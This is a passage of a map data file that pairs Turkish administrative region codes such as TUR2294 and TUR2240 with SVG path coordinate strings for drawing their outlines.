4.3 0.2 1.1-0.7 0.2-1.2-0.5-0.8 0.1-2 0.6-0.8 2.1-0.5 2.4-0.3 1.8-0.8 1.5-1.3 4.3 16.3-0.1 3.9 1.9 2.9 2.9 1.5 3.2 2.4 3.2 2 5.3-1.3 5.5 1.7 5.2 2.6z\",\r\n    TUR2294: \"M513.8 33l-2 4.8-0.3 3.5 0.9 3.3 0.1 2.1-0.2 2 0.3 1.6 0.7 1.4 0.3 2.1 0.5 4.1-1.1 0.8-2.6-0.7-1.1 0.5-1.6 1.1-2.2 0.4-2.3-0.3-1.6-0.9-0.9-1-0.5-0.2-2.3-0.3-0.5-0.4 0.6-0.8-1.8-0.9-0.8-0.6-0.3-0.6-0.1-1.3-0.3-1.2-0.5-1-0.5-0.6-0.6 1-1.4 0.8-2.7 1.1-1.7 1.6-0.6 0.3-1.4 0.1-0.5 0.2-0.5 0.6 0.4 1.3-0.8 0.8-1.2 0.6-0.8 0.6-0.1 0.5-0.1 1.2-0.4 0.9-0.9 0.8-1.1 1.4-6-1.9-0.9-0.6-0.5-1-1.3-1-1.6-0.4-1.7 0.4-1.8-0.3-0.8-1-1.2-0.2-1.9 0.1-1.4-1.7 0.4-9.1-0.5-1.4-0.4-1.3 0.5-2.7 1-2.3 1.6-1.5 1.7-1.2 1.8-4.7-2.9-3.9-3.5-1-6.3-0.3-3.2-0.9-2.2-0.2-1.9 0-3.4-1.3 0.1-2.3 2.6-3.2 1.5-4.1-0.2-4 6 0.9 5.9-1.7 2-0.2 0.8 0.2 1.5 0.8 1.8 0.6 6.9 0.4 2.7-0.3 2.7-0.8 0.9-0.5 2-1.6 1.9-1.1 1.5-2 1.2-2.3 0.3-2.1 0.8 0.3 1.5 0.2 0.6 0.5 0.1-0.5 1-0.1 0.4 0.9 0.9 1.1-0.2 0.5 0 0.4 1.9 1.6 1.2 0.5 1.5-0.1 0.6-0.4 0.8-0.9 0.6-0.2 0.7 0.2 0.6 0.3 1 1 0 0.5-2.8-0.4-1.3 0.2-1.1 0.9-0.5 1-0.4 1.6-0.3 1.6-0.1 1.3 0.4 1.1 1.4 2.6 1.6 2.1 2.8 2.4 0 0.5-0.7 0 0.3 0.9 0.5 1.1 0.7 0.9 1.5 0.8 1.5 1.9 0.8 0.6 3.1 1.3 2.3 0.4 0.8 0.5 1.7 1.6 1.9 1.1 0.7 0.2z\",\r\n    TUR2297: \"M576.6 87.1l-0.9 1.9 0.6 2 0.7 0.5 2.3 0.5 2.9 1.8 4.4 1.5 2.6 1.7 3.5 1.4 3.7 0.3 3.6-0.5 3.5 0.3 11.9 8.4 7.1 0.4 1.7 3.3 0.9 4.2-2.6 5.4-3.2 4.4-1.8 0.8-2 0.5-0.8 0-0.7 0.2-1.8 1.5-1.9 1-4.4 0.7-4.4-0.3-4.8 0.7-6.8 1.8-1.9 0.8-6-0.8-2 0.6-1.9 1.1-1.4 4-1 4.1-1.1 2.6-1.6 1.7-7.7 3-8.6 0.4-12.2 2.5-0.6-1.5-1-0.9-1-2 0.1-2.6 0.4-3.8-2.2-2.2-2.2 0.6-2.2 1-2.4 0.5-2.4 0.2-4.1-0.8-4.9 0.4-4.1-2.9-3.6-4.1 2.1-4.4 1.5-1.6 2.8-1.2 1-0.3 1.8-0.8 1.6-1.8 1.3-2 1.6-2.7 2.3-5.2 1.4-1.7 4.3-0.3 4.2 1.1 1.3 1.1 1.5 0.8 1.1 0.3 1 0.5 0.9 0.7 1 0.1 3.2-1.6 4.3-2.8 0.7-0.7 0.8-0.5 0.4-3.5 4.2-0.9 2.3-3.3 0-2.5 0.9-2.3 1.8-2.7-1-2.7-0.9-0.4-0.8-0.6-1.1-1-0.6-1.2 0.7-0.9 0-0.5-0.4 0 0-0.5 1.5-0.8 5.7-1.4 1.8-0.8 0.3-0.5 0.4 0.2 2.7 0.1 1.8 1.3 0.9 1.6z\",\r\n    TUR2296: \"M599.9 67.5l0 0.4-2.8 3.7-2.9 3.2-2.2 4.3-4.2 2.3-2 2.3-0.8 0.6-1.9 1.1-2.1 0.7-2.2 0.2-1.1 0.5-1.1 0.3-0.9-1.6-1.8-1.3-2.7-0.1-0.4-0.2-0.3 0.5-1.8 0.8-5.7 1.4-5.6-4.1-0.9-1.4-0.6-1.6-1.5-1.6-1.9-0.7-2 1.3-1 3.1-1.6 2.9-2.3 1.5-1.9 1.7-2.2 0.5-4.1-2-6.9-0.1-2-0.4-3.9 0.3-1.8-0.5-1.8-3.1-7.5-5.8-1.7-1-3.2 0.6-16.2-4.6-2-0.5-4 0.5-0.8-2.6-0.3-2.7-0.7-2.5-2.7-4.9 0.8-0.6 1.2-0.6 0.8-0.8-0.4-1.3 0.5-0.6 0.5-0.2 1.4-0.1 0.6-0.3 1.7-1.6 2.7-1.1 1.4-0.8 0.6-1 0.5 0.6 0.5 1 0.3 1.2 0.1 1.3 0.3 0.6 0.8 0.6 1.8 0.9-0.6 0.8 0.5 0.4 2.3 0.3 0.5 0.2 0.9 1 1.6 0.9 2.3 0.3 2.2-0.4 1.6-1.1 1.1-0.5 2.6 0.7 1.1-0.8-0.5-4.1-0.3-2.1-0.7-1.4-0.3-1.6 0.2-2-0.1-2.1-0.9-3.3 0.3-3.5 2-4.8 1.6 0.6 2.4 0.3 2.3-0.2 1.1-0.5 1.9-1.2 3.2-0.6 5.6-2.3 1.2-0.2 1.2-0.5 2.2-1.7 1.1-0.3 0 0.5-0.5 0.9-0.4 0.3-0.5 0.2 0.1 1.1-1 2.2 0.2 1.1 0.3 0 0.2-1.7 0.5-1.5 0.7-1.2 0.7-0.9 0.8-0.5 3.2 2.9 0-0.9 0.3 0 4 5.1 0.7 2 0 2.9-0.2 0.7-0.5 1.4-0.1 2.3 0.2 1.1 0.6 1.2 2.3 2.9 1.3 0.9 1.7 3.4 0.9 0.7 2.6 1.4 1.5 0.3 0.3 0.4 0.3 2 0.4 0.4 1.2 0.4 1.1 1.5 0.5 0.2 1 0.1 0.4 0.4 1 0.4 1.3-0.3 2.2-1.3 2.7-2.4 0.5-0.7 0.1-0.6 1.1-1.9 0.3-1.5 0.6-0.7 0.7 0.1 0.9 0.3 1.1 0.2 4.5 0 4.1 1.1 7.7 3.9 1.6 1.4 0.9 2.2 0.1 3.1 0.3 1.2 0.8 0.5 1.1 0.2 2 1.2 1.1 0.5 0.8 0z\",\r\n    TUR2299: \"M880.7 105.3l-0.4 2.4-0.8 2.3 1.2 6.9-2 1.3-2.2 0.9-1.8 1.2-1.7 1.4-3.3 1.9-7.6 2.6-1.6 3.7 1.8 2.2 1.1 1.8 1.3 1.4 4.5 0.8 1.7 0.6 1.5 1.1 0.9 1.2 0.7 1.4 0.8 0.7 1.1 0.3 2 0.9 1.4 2.1 1.2 2.7 1.6 2.5-1.5 1.6-1.7 1-1.4 0-0.7 0.1-1.2 0.6-1.1 1.6-1.9 0.6-3.9-0.7-1.9 0.8 4.3 5.2 7.4 3-0.7 0.5-0.6 1.8 0.1 9.2-0.5 3.2-1.6 2.7-1.1 0.4-2 0.3-1.9 0.1-7.2 3.6-1 3 0.3 3.1-1.5 2.5-3.6 2.2-1 1.2-1.6 1.5-6.4 1.1-2.1 1.2-2.1 1.6-4.5-0.2-4.4-1.8-1.3-1.1-3-4.3-5.1-5-1.9-1.3-4.2-1-8.4 1.4-2.2-3.9-2.3-2.7-3.2-0.4-3.8-1.8-5.1-4.8-1.6-0.9-1.5 0.8-1.5 1.1-4.7 2-4.6-0.7 0.1-4.1 1.9-3.6 1.2-2.8-1.7-1.9-2.2-1-2-1.4-1-1.2-0.7-1.4-0.2-1.9 0.1-1.9-3.5-4.6-8.9-0.2-2.8-1.4 0.5-3.9 1.6-3.6 8.5 1 1.9-0.3 2.3-1.8 2.2-2.2 2.9-1.4 6.5-2.3 1.5-1.8 1.2-2.5-0.1-1.4-3.5-0.3-1.5-0.6-3.4-0.8-3.2-1.8-1.3-4.2-1.5-9.3-1.7-4.2 8.5-4.3 2-0.5 2.2-0.3 3.1-0.9 1.6-3.9 1.8-0.8 2.3 0 2.2-0.8 5.6-4.8 4-2.3 4 2.3 6.5 1 1.9 0.7 0.4 2.2-1.4 2.5-0.7 5.9 3.6 3.1 4.8-1.8 4.4-2.9 4.1-1.2 4 1.2 4.5 2.5 2.4-3.6 0.1-3.1 1-2.7 2.1-2.1 1.3-2.8-0.3-3 0.6-2.7 1.6-1.4 1.8-1 3.6-0.3 3.6 0.4 3.1-0.7 3-0.3 1.1 5.3 2.7 4.1 1.9 1.3 1.5 1.9 1.1 2.7 1.5 2.3 2.1 2.1 1.6 2.8z\",\r\n    TUR2298: \"M876.2 47.7l0.7 4 0.4 3 0.6 1.7 0.4 0.7 1 2.5 1.5 4.8-1.4 4.7-4.4 2.2-4.5 5-3.3 6.5-3 0.3-3.1 0.7-3.6-0.4-3.6 0.3-1.8 1-1.6 1.4-0.6 2.7 0.3 3-1.3 2.8-2.1 2.1-1 2.7-0.1 3.1-2.4 3.6-4.5-2.5-4-1.2-4.1 1.2-4.4 2.9-4.8 1.8-3.6-3.1 0.7-5.9 1.4-2.5-0.4-2.2-1.9-0.7-6.5-1-4-2.3 0.7-2.8 5-5.8 1.2-0.6 1-1 0.5-1.5 0.8-1.4 2.8-1.8 1.4-3.3-1.5-1.7-2.1-1-0.5-1.2-0.6-1.2-1.1-0.7-1-0.9-1-2.4-0.4-2.7-1.5-3.8 4.5-3.7 1.3-0.5 1.1-0.6 0.6-0.2 1.8-0.2 0.7-0.3 1-0.7 0.7-1.3 0.6-1.4 0.2-1.6 0.5-0.3 3.1-2.8 0.7-1.3 5.5 2.4 0.7 0.1 1.6-0.1 1.3-0.6 0.4 0.3 0 1.1 0.2 0.4 0.6 0.2 1.5 0.2 0.7 0.3 2.1 1.9 0.6 0.3 0.5-0.3 2.1-1.8 1.6-2.4 0.8-0.5 2.1-0.9 3.7 1.5 1.8-0.6 0.8-0.4 0.7-0.1 0.7 0.1 0.8 0.4 1.6-0.5 0.8 0 0.8 0.5 0.8 0.8 1.3 0.1 2.5-0.1 9.2 3.5 0.7 0z\",\r\n    TUR5520: \"M387.1 71.2l-2.2 5.6-5.1 2.8-5.1-0.5-1.8 1.1-2.5 4.5-6.2 5-5.4 2.5 0.2-1.8-2-3.6-6-3-2.4-1.5-1.5-0.3-1.2-0.8 0-1.9 0.2-1.9-4.4-1-2.6-0.1 0-6.2 1.7-5.6 0.9-3.6 1.9-2.3 2.7-3.9 5.7 0.3 5.5-1.4 6.3-5.4 2.3-5 3-0.9 4.9-4.7 1.8 2 3.1-0.5 3.9-1.3 3.7 2.8 1.5 6.2 1.5 3.4-5.1 1.1-2.8 2.7-2.3 3.2-0.5 2.4 1 7.4 2.9 0.5 2.8 1.2 1.1 1.6 0.5 0.9z\",\r\n    TUR5521: \"M374 37.6l-4.9 4.7-3 0.9-2.3 5-6.3 5.4-5.5 1.4-5.7-0.3 1.1-5.9-1.9-4.8-1.1-3.6-3.1-1.4-3-3 1.5-0.9 0.8-1.7 3.4-3.9 0.3-0.4 0.8-1.5 1.7-0.5 2.9-0.2 0.1-0.4 1-0.5 0.2-0.8 0.5 0 0.7 0.8 0.9-0.5 1.2-1.3 0.7-0.6 3.6-1.9 0.6-0.5 0.7-0.3 0.8-0.1 0.8 0.4 0.6-1.1 1.2-0.9 1.4-0.3 1.2 0.6 0.9-0.1 3.1-1.2 0.8-0.4 0.8 0.1 1.5-0.1 0.5 4.2 1.5 3.1 1.9 5.1-3.4 2.4 0.5 5z\",\r\n    TUR5518: \"M197.3 99l0 6.1-0.4 2.7-3.3-0.7-3.3 3.5-3.3 0.7-8-3.5-1.6 0.2-3.6-0.9 0.1 7.4-0.5 0.2-2.8-0.6-4.6-2.9-2.8-0.7 0.9-2.1 1.8-1.2 3.7-1.4 1.6-1 2.2-2.3 0.8-0.4 15.4-1.4 2.2-0.8 2.1-1.2 1.1-0.8 0.4-0.1 0.4 0.4 0.4 0.6 0.5 0.5 0.6-0.3z\",\r\n    TUR3041: \"M843.1 299.6l3.1 8.2 1.5 5.7-0.6 4.4-3.9 1.9-5 2.7-2.1 2.4 0.8 2.7 6.1 1.9 3.2 2.8 1.1 4.1-21.8 5.1-14.5 0.7-1.1-0.3-2.3-1-12.5-2.5-9.7 1.5-2.6 1-7 3.9-2.4 0.7-1.2 0-1.1 0.3-1.1 0.4-1.1 0.6-6.9 4.7-2.2-1.2-4.8-8.4 0.6-5.2-0.7-1.4-2.6-2.7-1.7-1.4-1.5-1.6-0.7-7.8 5.1-6.6 2.3-2.1 5.7-4 2.6-1 5.8-4.5 4.2-0.3 2.4-3.3 0.7-1.5 5.7-1.2 18.2 0.4 3.4-1.5 1.3-0.1 1 0.5 3.6 4.7 3.7 7.6 5.6 3.5 8-1.6 5.8-4.3 9.6-6.9z\",\r\n    TUR4840: \"M980.8 170.6l-0.8-0.7-2.1-0.5-9.3 2.2-4-0.5-3.9-1.2-5.2 0.6-4.8-0.7-0.3-1.1-0.3-0.9-3.3-0.8-4.7-2.2-1.6-2.1-1.1-2.5-1.7-1.2-1.1 0-1.7-0.8-0.7-0.6-1.7-0.3-3.5 1.4-3.3 2.4-1.8-0.7-0.9-0.8-0.7-2.5 0-1.6 0.3-3.3-1.2-3.8 2-2.3 0-2.6 2.7-1.3 6.5-1 6.9-2.4 2.4 1.3 4.7 1.4 5.7 3.1 6.3 1.1 0.9-0.3 1.8-1.3 1.1-0.3 0.5 0.2 0.7 0.6 0.4 0.2 0.5-0.1 1.1-0.3 1.5-0.2 3.1-0.9 1.8 0 1.9 0.6 7.2 4.3 3.1 2.6 1.3 1.5 0.6 1 0.4 1.6 0.5 0.5 0.7 0.6 0.2 0.6 0 0.8 0.2 0.4 0.7-0.4 1.9 2.2 1 0.5 0.8 0 0.5 0.3 0.3 0.5 3.2 4.2 1.3 2.3 0.6 2.5 0.6 0.9-4.2-3.1-1-0.9-3.2-1.4-0.7-0.9-1.4-2.1-0.8-0.6-1.3 0.4-5.5 4.6-0.2 0.8 0.2 2.2-0.1 0.8z\",\r\n    TUR3009: \"M437 87.3l2.6 4.3-0.6 2.7-1.1 2.7 0.3 3 1.3 2.5 0.4 2.4-0.2 2.5 0.7 2.6 1.3 2.1 0.8 1.7 0.6 1.8 0.3 1.8-0.1 1.8-0.7 0.5-1.2 2.8-1.5 2.6-1 0.5-1 0.2-4.2 2.4-4.8-0.5-14.4-4.6-7.1-2.3-1.5-1-1.7-0.6-1-0.1-1 0.5-0.5 1.9-0.3 1.7-3.8 0.5-3.4-2.7-0.6-2.4-1.1-1.7-1.7-1-2.2-2-0.9-0.4-2-1.5-1.7-2-1.2-2.3-1.5-2.1-15.3-7.1-4.1-0.7-4.1 0.2 0.8-3.8 0.2-2 5.4-2.5 6.2-5 2.5-4.5 1.8-1.1 5.1 0.5 5.1-2.8 2.2-5.6 1.2 1.6 0.7 0.6 6.7 0.8 4.7 3.1 2 2.3 2.4 0.8 2-0.7 5.5-3.3 4-0.7 8.5-4.6 1.7-0.6 0.8 0.5 0.6 2.7-1.6 2.2-1.4 1.5-0.6 2.1 2 3.3 3 1.1 1.7 1.6 1.7 1.2 2.2 0.5 2.1 0.1z\",\r\n    TUR2263: \"M259.7 123.7l0.7 3 3.2 5.7 2 2.4-5.4 0.3-4.2 3.4-0.9 3.5-0.7 3.5-1.7 3.2-2.7 1.9-2.8 0-2.7 1.2-0.8 1.4-0.9 1.3-1.6 0.9-1.3 1.1-0.6 7-2.2 4-2.9 3.3-2 0.5-3.9 0.5-4.1 1.2-2.2-0.7-5.8-4.1-1.8-0.8-2.1-1.3-0.9-1.1-1.7-3.7-0.3-2.8 0.9-5.8 2.9 0.6 2.6-1-0.7-3.4-1.4-1.1-2.7-3.9-0.1-3.4 1.5-6.9 5-5.3 0.9-1.9-0.2-1.8-1.2-1.5-0.2-2.2 0.6-1.6 0.6-1.9 0.2-2.2 1-1.9 1-1.1 1.1-0.9 2.8-1.5 1.5 3.1 1.8 2.8 2.1 1.7 1.9 2.1 4.6 1.4 7.2-1.9 2.3-0.2 1.9 0.6 2 0 1.6 1 1.3 1.9 0.9 0.8 3.9-0.1 2.7 0.7z\",\r\n    TUR2264: \"M150.5 111.1l-0.6 0.3-0.2-0.5 0.4-1.9-0.2-1.1 0.9-0.3 0.5 0.3 0.1 0.3-0.3 0.3-0.6 2.6z m73.5-1.3l-2.8 1.5-1.1 0.9-1 1.1-1 1.9-0.2 2.2-0.6 1.9-0.6 1.6 0.2 2.2 1.2 1.5 0.2 1.8-0.9 1.9-5 5.3-1.5 6.9 0.1 3.4 2.7 3.9 1.4 1.1 0.7 3.4-2.6 1-2.9-0.6-1.6 0.2-1.5 0.7-1.7 0.3-1.6-0.2-5.5-2.2-2.6 1.9-1.1 4-0.6 1.6-1 1.1-1.5 5.4-2.4 1.8-1.1 3.1-0.3 4.5-2.9 1.8-3.7 0.1-3.7-0.5-2.3-0.5-2-1.6-1.2-1.3-1.6-0.8-2.4-0.1-2.4 0.5-2.1-0.3-1.3-2-0.7-0.5-1-0.1-0.6-0.4-0.3-0.8-1-1.7-0.1-1.8 0.2-1.4-0.8-1.2-1.3 0.7-1.2 1.1-4.1-0.5-13.8-10.2-0.9-2.1-1-4.8-0.9-1.7-2.9-2-1.9-3.1-0.9-2.5-0.3-1.4 0.7-2.6 0.7-1.1 0.5-1.2-1-2.2-1.2-0.4-0.4-2.3 1.4-1.4 1.5-1.3 2.5-3.8 0.3-0.5 7.3-0.3 2.7 0.4 4.5-0.1-1 0.3-0.3 0.5-0.2 0.6 2.2-0.8 2.4 0 2.4 0.6 2.4 1.1 0.3-0.4 0.7 0.4 0.5-0.2 0.5-0.5 0.4-0.2 3-0.5 0.8-0.7 0.8-0.4 1 0.1 1.8 0.6 1.5 0.1 1.5 0.3 0.7 0.3 1.3 0.8 0.9 0.3 0.9 0.2 4-0.1 0.9-0.2 0.8-0.6 0.4-0.9 0.5-1.8 0.3-0.8 0.7 0.3 0.9-0.1 0.9-0.3 0.8-0.4-1-1.1-1.1-1.1-1.3-0.8-1.1-0.3-2.9 0-0.4 0.3-1.2 0.9-0.1-7.4 3.6 0.9 1.6-0.2 8 3.5 3.3-0.7 3.3-3.5 3.3 0.7 2.9 0.9 3.1-0.2 9.6-3.6 3.6-0.7 7.1 2.6 0.3 1.6 0.5 1.4z\",\r\n    TUR2265: \"M181.3 88.1l-0.2 1.1-0.7-0.5 0-1 0.5-0.9 0.8-0.2-0.1 0.9-0.3 0.6z m38.6-20.9l0.1 0.6 0.5 2.1 0.2 2.2-1.5 3.5-2.8 1.6-3.4 1.3-3 2.1-0.4 1.7-0.9 1.6-1.9 0.2-1.5-1.3-1.6-3.4-2.5-2.1-2.7-0.3-2.3 1.7-2.2 2.2-1.3 0.7-2.7 2.3-1.8 2.3-0.7-0.4-1.1 0.2-1-1-2.9-1.4-1.1-0.9-1.1-1.4-1-0.9-2.9-1.5 0.4-0.5-0.6-0.3-0.3-0.7-0.2-1-0.4-0.9 1-0.5 1.1-1.2 0.8-1.4 0.7-2.7 0.6-1 0.2-0.8-1.1-0.8 1.2-1.9 1.9-2.2 2.1-1.5 1.9 0.3 0.5-0.7 0.8-0.1 9.8 1.8 10.4 2.5 12.7 1.9z m-88 4.8l-0.6-3.8-0.7-5.3 0.7-4.2 1.6-5.7-0.6-4.6-1.4-4.9 0.1 0 2.4-3.4 1.6 1.5 7.9 5 11.2 4.9 16.1 7.7 5.1 1.1 0.6 0.5 0.7-0.1 0.3-0.7 0.4-0.1 1.2 0.2 1.3 0.5 0.8 0.7-0.4 1.8-0.7 1.3-0.9 1.1-0.9 0.6-0.6 0.2 0.1 0.4 0.4 0.6 0.7 1 0.3 0.3-0.4 0.8-0.2 1.4-0.4 1.2-0.5 1.1-0.5 0.8-0.4 0.4-1 0.3-0.4 0.3-0.4 0.6-0.1 0.4 0.3 1.2-0.6 0.4-1.1-0.1-0.5-0.4-0.6 0.2-0.6 0.7-0.6 0.2-0.9 0.6-2.1 0.5-0.5 0.2-0.8 0.7-0.6 0.2-1.3-0.1-0.6-0.2-0.3-0.4-0.5-0.5-1.3-0.1-6.3 0.8-1.6-0.6 0.5-2.2-0.6-0.7-0.9-0.3 0.4-1.6-0.5-1.4-1.1-0.9-1.3-0.3 0.3 1 1.1 1.1 0.4 1.2 0.1 0.7-0.2 1-0.3 1-0.7 0.6-1.5-0.2-2.7-2.8-1.3-0.7-1.7-0.3-3.6-1.4-1.8-0.3-1.8 0-0.4-0.1-0.6-0.7-0.4-0.1-2 0.4-0.9 0.1-0.4-0.3z\",\r\n    TUR2266: \"M249.5 65.8l-0.3 1.1-1.7 4.2 0.9 3.5 3.9 0.8 0.2 2.2-1.2 2.2-0.3 2.3-0.9 0.2-2.9 0.1-1.7-0.9-2.1-0.4-0.9 0.6 0.4 1.5 0.7 0.2 0.6 0.4-3.4 3.7-2 10.3-2.2 4.2-3 2.1-3.4 0.8-1.6 0.9-1.7 0.7-3.7 0.3-7.1-2.6-3.6 0.7-9.6 3.6-3.1 0.2-2.9-0.9 0.4-2.7 0-6.1 0.5-0.3 1.2-0.6 0.5-1.1 0.4-0.3 1.2-0.3 0.5 0.1 0.9 0.4 0.7 0.8 0.4 1.3 0.5 0 10.1-2.3 6-0.3 1.9 0.8 1 0 0.8-1.3-0.5-1.6-2-0.3-4.3 0.5-1.1 0.5-0.6 0-0.6-0.3-1.1-1-0.3-0.2-0.8-0.1-1.9-0.7-1-0.1-12.4 0.5-1 0.3-0.8 0.7-0.9 0.4-1-0.5-0.5-0.5-0.4-1.2-0.6-0.2 0.8-0.5-0.2-0.7-0.4-0.5-0.9-0.6-0.2 0.4-0.5-0.4-0.5 0.4-0.6 0.2-1.4 0.3 0-0.4 0.5-0.1 0.4-0.3 0.1-0.4 0.1-0.7 0.5 0.3 0.5-0.3-0.6-0.9-1-1.3-0.5-0.4 1.8-2.3 2.7-2.3 1.3-0.7 2.2-2.2 2.3-1.7 2.7 0.3 2.5 2.1 1.6 3.4 1.5 1.3 1.9-0.2 0.9-1.6 0.4-1.7 3-2.1 3.4-1.3 2.8-1.6 1.5-3.5-0.2-2.2-0.5-2.1-0.1-0.6 1.2 0.1 13.1 0.4 1.5-0.2 0.8-0.4 1.2-0.8 0.7-0.2 0.5-0.4 0.7-1.4 0.4 0.4 0.6-0.6 0.6-1.1 0.6-0.3 0.7 0.6 2.1 0.4 1.8 1.4 3.1 0.7z\",\r\n    TUR2267: \"M276.9 71.9l-0.1 0.7 0.3 2 0.1 1.5-3 2.8-1.8 4.1 0.4 2.1 0.9 1.8 0.1 2.1-0.7 2 0.5 1.8 1.1 1.6-1.2 2.1-3.3 2.6 0.2 2.2 0.3 2.2-0.6 2-3.4 1.6-3.6-0.1-2.1 3.2-1.5 4.2-0.8 0.5-0.6 0.7 0.3 1.8 1.1 1.4 1.2 2.4-1 2.5-2.7-0.7-3.9 0.1-0.9-0.8-1.3-1.9-1.6-1-2 0-1.9-0.6-2.3 0.2-7.2 1.9-4.6-1.4-1.9-2.1-2.1-1.7-1.8-2.8-1.5-3.1-0.5-1.4-0.3-1.6 3.7-0.3 1.7-0.7 1.6-0.9 3.4-0.8 3-2.1 2.2-4.2 2-10.3 3.4-3.7-0.6-0.4-0.7-0.2-0.4-1.5 0.9-0.6 2.1 0.4 1.7 0.9 2.9-0.1 0.9-0.2 0.3-2.3 1.2-2.2-0.2-2.2-3.9-0.8-0.9-3.5 1.7-4.2 0.3-1.1 14 3.4 1.8 1.6 0.8 0.5 4.4 0.8 6.4-0.2z\",\r\n    TUR2268: \"M339.1 76.3l2.6 0.1 4.4 1-0.2 1.9 0 1.9 1.2 0.8 1.5 0.3 2.4 1.5 6 3 2 3.6-0.2 1.8-0.2 2-0.8 3.8-1.9 0.8-1.5 1.4-0.2 3.7 2 5.5-0.9 1.6-1.9 2.1-1.4 2.5-4.2 2.3-7.2-1.1-2.2 0.7-2.2 1.5-6.1 1.5-3.6 1.7-4.5 1-6.5-0.1-2 0.2-4.7 1.9-1.7-0.2-1.6-0.6-1.5-0.2-1.2-0.6-1.7-1.9-8.8 1-4.6-2.8-4.9-1.7-1.3 1.4-0.5 2.6 0.2 4.1-1.6 3.5-4.3 2.5-3.2 4.3-3.4-0.6-3.1-1.2-2-2.4-3.2-5.7-0.7-3 1-2.5-1.2-2.4-1.1-1.4-0.3-1.8 0.6-0.7 0.8-0.5 1.5-4.2 2.1-3.2 3.6 0.1 3.4-1.6 0.6-2-0.3-2.2-0.2-2.2 3.3-2.6 4.3 1.5 8.5-0.2 5.9 2.5 5-0.6 4-3 1.9-5.1 0.2-3.6 2.6-1.9 6.7-1.2 4.8-1.1 2.6-3 0.9-6 3.8 0.3 3.2 0.9 11.2 0.3z\",\r\n    TUR2269: \"M272.1 136.6l2.2 2.8 0.6 4.1 0.3 1.4 1.2 0.4 2.1-0.1 5-2.2 3 0.3 1.3 0.9 1.4 0.5 1.5-1.1 1.4-1.2 4.8 0.6 1.3-0.4 1.3-0.2 2.2 2.3 1.5-0.5 1.7 0.6 2-0.5 3.8 0 1.9-0.7 2.1 1.4 2.4-0.3 0 2 0.6 1.2 0.2 1.7 0.8 2.1 1.3 2 1.5 0.9 1.8 0.1 0.4 1 0.7 1.1 0.7 0.5 0.1 1.8-2.2 2.4 0.4 3.4 2.6 7.2 2.6 2.3 0.7 1.4 0.2 2.1 0.8 1.2 0.6 1.4 0 2.1-0.3 2-0.5 2.1 0.3 1.2 0.1 2.6 1.1 1.8 1.6 1.1 0.4 2-1 1.7-1.3 1.2-1.1 0.1-1.1 0.4-1 1.4-2.7 1.3-1.3 0.9-0.2 2-0.3 1.9-0.8 1.1-4.1 0.7-3.1-0.4-2-0.5-4.1-0.1-6.7 0.7-3.9-3-2.6-5.9-3.7-3.9-2.1 0.6-1.8 1.6-1.9 1.3-2 0.5-3.8 2.9-3.8 1.7-2.2-2.6-2.6-1.2-1.9 1.4-3.3 3.3-3.5 2.3-1.8 0.9-2.4 0.4-2.4-1.3-0.8-0.7-0.9-0.5-1.2-1.5-0.8-2.2-1.4-1.4-1.9-0.4-0.9-4.3-5.2-6.9-0.7-5.2-1.4-4.1-5.7-5.5-2-3.3 2.9-3.3 2.2-4 0.6-7 1.3-1.1 1.6-0.9 0.9-1.3 0.8-1.4 2.7-1.2 2.8 0 2.7-1.9 1.7-3.2 0.7-3.5 0.9-3.5 4.2-3.4 5.4-0.3 3.1 1.2 3.4 0.6z\",\r\n    TUR2240: \"M62.2 9.7l1.4 8.1 1.6 6.7 0.6 6.8-1.1 6.7-2.2 3.2-0.8 5.1-2.5 5.3 1.6 3.1 0.6 1.3 0.4 9.7-0.8 4.1-2.6 3.3-1.6 4.2-0.9 4.8 0.3 5.6 2 4.4 1.4 4.5 0 0.2-0.4 4.3-3.4 0.6-1.2 0.6-0.7 0.2-3.6 0-1.4 0.5-4 2.3-1.5-1-0.8-0.3-0.9-0.1-0.7 0.3-0.8 0.5-0.8 0.2-1.4-0.7-0.9 0.1-2.8 0.8-9.6 0-1.4-0.2-0.7-0.5-0.5-1-0.3-1.3-0.4-1 0.3-1.1-0.1-1.5-0.5-1.5-0.8-1.1 0.5-0.2 2 0.2 1.6-0.8 1.2-1.4 0.4-1.8 0.8-1.3 2.8-2.4-0.4-0.8 0.1-0.4 0.3-0.6 0-0.4 1.1-0.5 0.3 0 0.4-0.4 0.3-0.6 0.4-1.4 0.3 0 0.5 0.7 0.8 0.3 0.7-0.2 0-0.4-0.5-0.8 0.6-0.6 1.5-0.7 0.8-0.6 0.5-0.7-0.7-0.5-0.5-0.7-0.2-0.6 0.2-0.5 0.4-0.2 0.8-0.1 0.4-0.4 0.4-0.8 0-0.8-1.4-0.7-0.5-0.7-0.7-1.6-0.1-1 0.9-1.8-0.4-0.3-0.8-0.2 0-0.6 1-1.5-0.6-1.2-0.2-1.3 0.2-1.3 0.6-1.5-0.8-1.2 0.5-0.6 3.4-0.3 0.8-0.5 1.4-1.2 1.5-1 0.6-0.8 0.6-0.1 2.6-2.9 0.6 0.7 1 0.6 1.1 0.3 0.9-0.1 0.7-0.7 0.5-1.2 0.2-1.4 0-1.5-0.2-1.4-0.8-3.4-0.3-2.6-0.2-1.2-0.6-1 0.3-0.7-0.2-1.8 0.3-0.8-0.4-0.9 0-1-1 1.5-0.5-0.6-2.4-1.2-2.9-2.2 0.4-0.9 0.2-1-0.8-0.2-1-0.4-2-0.6-1.4-1.3-0.9-0.3-1.4 0.2-0.5-0.8-0.4-1.4 0.2-1.5 0.8-1.7 2.1-1.9 5.4 0.2 2.5-0.7 0.7-1 0.4-1.3 0.2-1.2 0.2-1.3 0.2-1.1-0.7-0.6 0.1-0.7 0.7-0.6 1.5-1.7 0.8-0.6 1-0.1 4.9 0.8 1-0.1 0.5-0.4 1.1-1.1 0.6-0.2 0.5 0.3 1 0.8 0.6 0.2 0.9-0.7z\",\r\n    TUR2241: \"M133.4 40.1l-2.4 3.4-0.1 0-9.1 1-9 1.1-5.7 1.4-5.1 1.5-2.4 3.7-1.9 3.9-3.1 2.3-3.3 0.9-2.9-1.9-2.3-3.1-2.9-2-6.1 0-8.5 0.7-7.8 1.7-1.6-3.1 2.5-5.3 0.8-5.1 2.2-3.2 1.1-6.7-0.6-6.8-1.6-6.7-1.4-8.1 1.2-0.9 0.6 0 1 0.2 0.5-0.6 0.6-0.2 0.9 0.1 0.5-0.1 0.6-0.7 0.9-1.6 0.7-0.3 1-0.7 1.2-2.1 1.2-0.7 1 0 1 0.3 0.8 0.5 0.8 0.7 1.8 0 1.2 0.3 1.6-2.1 0.7-0.6 1.1-0.1 1.8 0.4 1.7 1 1.4 1.4 2.2 3.4 1.2 1.4 1.2 1.1 3.9 2.2 0.7 0.6 1.3 1.8 0.7 0.5 